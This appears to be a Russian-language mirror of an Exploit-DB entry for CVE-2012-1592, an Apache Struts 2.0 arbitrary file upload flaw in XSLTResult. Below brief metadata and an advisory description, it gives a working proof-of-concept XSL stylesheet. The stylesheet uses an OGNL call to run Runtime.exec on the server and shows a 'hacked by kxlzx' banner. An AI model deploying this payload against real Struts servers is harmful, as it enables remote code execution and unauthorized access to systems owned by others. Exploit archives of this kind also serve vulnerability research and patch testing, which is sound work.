- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 37009
- Проверка EDB
-
- Пройдено
- Автор
- VOIDLOAFER
- Тип уязвимости
- WEBAPPS
- Платформа
- JAVA
- CVE
- cve-2012-1592
- Дата публикации
- 2012-03-23
Apache Struts 2.0 - 'XSLTResult.java' Arbitrary File Upload
XML:
source: https://www.securityfocus.com/bid/52702/info
Apache Struts2 is prone to a remote arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input.
Attackers can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.example.com/1999/XSL/Transform"
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html>
<body>
<h2>hacked by kxlzx</h2>
<h2>http://www.example.com</h2>
<exp>
<xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
</exp>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
- Источник
- www.exploit-db.com